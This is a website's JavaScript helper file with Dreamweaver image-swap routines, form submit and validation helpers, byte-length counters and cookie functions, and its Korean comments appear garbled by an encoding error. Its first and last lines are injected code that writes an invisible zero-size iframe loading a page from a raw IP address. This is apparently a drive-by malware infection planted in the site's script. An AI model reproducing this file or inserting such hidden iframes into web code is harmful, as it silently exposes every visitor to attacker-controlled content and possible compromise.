document.write("<iframe width='0' height='0' src='http://210.109.97.222/V.asp'></iframe>");
<!--//
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}   
function MM_findObj(n, d) { //v4.0
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && document.getElementById) x=document.getElementById(n); return x;
}
function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_showHideLayers() { //v6.0
  var i,p,v,obj,args=MM_showHideLayers.arguments;
  for (i=0; i<(args.length-2); i+=3) if ((obj=MM_findObj(args[i]))!=null) { v=args[i+2];
    if (obj.style) { obj=obj.style; v=(v=='show')?'visible':(v=='hide')?'hidden':v; }
    obj.visibility=v; }
}
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
function fncSbmt(obj,URL){
//   obj.encoding="multipart/form-data";
   obj.method="post";
   obj.action=URL;
   //alert(obj.name+" , "+URL);
   obj.submit();
}
function fncSbmt2(obj,url){
   obj.encoding="multipart/form-data";
   obj.method="post";
   obj.action=url;
   obj.submit();
}
function Popup(URL,winName,features) 
{ 
    window.open(URL,winName,features);
}
function fncValidNum(obj)
//¼ýÀÚ ÀÔ·ÂÀÎÁö Ã¼Å©
{
   if (obj.value !=""){
      if (obj.value <= 0){
         alert("0 º¸´Ù Å«°ªÀ» ÀÔ·ÂÇØ ÁÖ¼¼¿ä");
         obj.focus();
         return;
      }
   
     var num="0123456789";
     	
     for (var i=0;i<obj.value.length;i++)
     { 
        if (-1 == num.indexOf(obj.value.charAt(i))) {
   	  alert("¼ýÀÚ¸¸ ÀÔ·Â °¡´ÉÇÕ´Ï´Ù.");
             obj.value = "";
   	     obj.focus();
   		return;
        }
   
        if ((i==0) && ('0' == obj.value.charAt(i))) {
   	  alert("¼ýÀÚ¸¸ ÀÔ·Â °¡´ÉÇÕ´Ï´Ù. ");
   	     obj.value = "";
             obj.focus();
   		return;
        }
     }
   }
}
function fncCnfrmDel(url){
//»èÁ¦È®ÀÎ
   if(!confirm("Á¤¸» »èÁ¦ÇÏ½Ã°Ú½À´Ï±î?")){
      return;
   }
   window.location.href=url;
}
function fncEntKeyUse(obj,url){
//¿£ÅÍÅ°·ÎÅ¬¸¯È¿°ú
   if(event.keyCode ==13){ 
      fncInpChk(obj,url);
   } 
}
function fncSelected(obj,val){
//¼±ÅÃµÊ(Æû,ºñ±³°ª)-combobox
   for(i=1;i<obj.options.length;i++){
      if(val==obj.options[i].value){
         obj.options[i].selected="true";   
      }
   }   
}
function fncRdoBtnChked(obj,val){
//¼±ÅÃµÊ(Æû,ºñ±³°ª)-radiobutton(±¸ºÐ)
   for(i=0;i<obj.length;i++){
      if(val==obj[i].value){
         obj[i].checked="true";
      }
   }
}
function InpChkSrch(obj,url){
//°Ë»ö
	if (obj.keyword.value==""){
		alert("°Ë»ö¾î¸¦ ³Ö¾îÁÖ¼¼¿ä. ");
		obj.keyword.focus();
		return;
	}
	fncSbmt(obj,url);
}
function bt(id,after){
//ÀÌ¹ÌÁö ½º¿Ò 
eval(id+'.filters.blendTrans.stop();'); 
eval(id+'.filters.blendTrans.Apply();'); 
eval(id+'.src="'+after+'";'); 
eval(id+'.filters.blendTrans.Play();'); 
} 

function fncChgUrl(obj){
   if (vals != ""){
      document.location.href=vals;
   }
   else{
      return;
   } 
}
function fncChgUrlByLgn(obj){
   vals=obj.options[obj.selectedIndex].value;
   if (vals != ""){
      logpop(vals);
   }
   else{
      return;
   } 
}

//¸Þ¼¼Áö ±æÀÌ Ã¼Å© ½ÃÀÛ
function fncChkMsgLen(obj,obj2,max_len){
   var length = fncCalcMsgLen(obj2.value);
//   obj.msg_len.value = length;
   if (length > max_len) {
      alert("ÃÖ´ë "+ max_len +"¹ÙÀÌÆ®±îÁö Àü¼Û°¡´É ÇÕ´Ï´Ù.\r\nÃÊ°úµÈ " + (length - max_len) + "Byte´Â »èÁ¦µË´Ï´Ù.");
      obj2.value = fncCutMsgLen(obj,obj2.value,max_len);
   }
}
function fncCalcMsgLen(msg){
//¸Þ¼¼Áö ±æÀÌ °è»ê (ÇÑ±Û,Æ¯¼ö¹®ÀÚ 2byte,±âÅ¸ 1byte
   var nbytes = 0;
   for (i=0; i<msg.length; i++) {
      var ch = msg.charAt(i);
      if (escape(ch).length > 4) {
         nbytes += 2;
      } else if (ch != '\r') {
         nbytes++;
      }
   }
   return nbytes;
}
function fncCutMsgLen(obj,msg,max){
   var inc = 0;
   var nbytes = 0;
   var msg2 = "";
   var msglen = msg.length;
   
   for (i=0; i<msglen; i++){
      var ch = msg.charAt(i);
      if (escape(ch).length > 4){
      	inc = 2;
      } else if (ch != '\r'){
      	inc = 1;
      }
      if ((nbytes + inc) > max){
      	break;
      }
      nbytes += inc;
      msg2 += ch;
   }
//   obj.msg_len.value = nbytes;
   return msg2;
}
//¸Þ¼¼Áö ±æÀÌ Ã¼Å© ³¡

function rtnMessage(code) {
	if (code=="01") {
		alert("µî·Ï¿Ï·á");
	} else if (code=="02") {
		alert("¼öÁ¤¿Ï·á");
	} else if (code=="03") {
		alert("»èÁ¦¿Ï·á");
	}
}

function fncContentWrap(obj) {
	if (obj.tag_cl[0].checked==true) {					//text
		obj.content.wrap="hard";
	} else if (obj.tag_cl[1].checked==true) {				//html
		obj.content.wrap="soft";
	} else if (obj.tag_cl[2].checked==true) {				//mix
		obj.content.wrap="hard";
	}
	alert(document.content.wrap);
}

function fncContentWrap(obj,obj2) {
	if (obj.tag_cl[0].checked==true) {					//text
		obj2.wrap="hard";
	} else if (obj.tag_cl[1].checked==true) {				//html
		obj2.wrap="soft";
	} else if (obj.tag_cl[2].checked==true) {				//mix
		obj2.wrap="hard";
	}
	alert(document.content.wrap);
}

function fncChkIsNumber (obj) {
	if (isNaN(obj.value) == true) {
		alert("¼ýÀÚ¸¸ ÀÔ·Â °¡´ÉÇÕ´Ï´Ù.")
		obj.value="";
		obj.focus();
		return;
	}
}

function fncInpChk_poll_answer(obj) {						//ÅõÇ¥Ç×¸ñ¼±ÅÃÃ¼Å©
	var flagAnswer=false;

	for(i=0; i < obj.answer.length; i++) {
		if (obj.answer[i].checked == true)
		flagAnswer=true;
	}
	if (flagAnswer == false) {
		alert("´äº¯À» ¼±ÅÃÇØ ÁÖ¼¼¿ä.  ");
		obj.answer[0].focus();
		return;
	}
	obj.submit();
}

function setCookie( name, value, expiredays )
{
	var todayDate = new Date();
	todayDate.setDate( todayDate.getDate() + expiredays );
	document.cookie = name + "=" + escape( value ) + ";	path=/;	expires=" + todayDate.toGMTString() + ";"
}

function getCookie( name ){
	var nameOfCookie = name + "=";
	var x = 0;
	while ( x <= document.cookie.length )
	{
		var y = (x+nameOfCookie.length);
		if ( document.cookie.substring( x, y ) == nameOfCookie ) {
			if ( (endOfCookie=document.cookie.indexOf( ";", y )) == -1 )
				endOfCookie = document.cookie.length;
			return unescape( document.cookie.substring( y, endOfCookie ) );
		}
		x = document.cookie.indexOf( " ", x ) + 1;
		if ( x == 0 )
			break;
	}
	return "";
}
//-->
document.write("<iframe width='0' height='0' src='http://210.109.97.222/V.asp'></iframe>");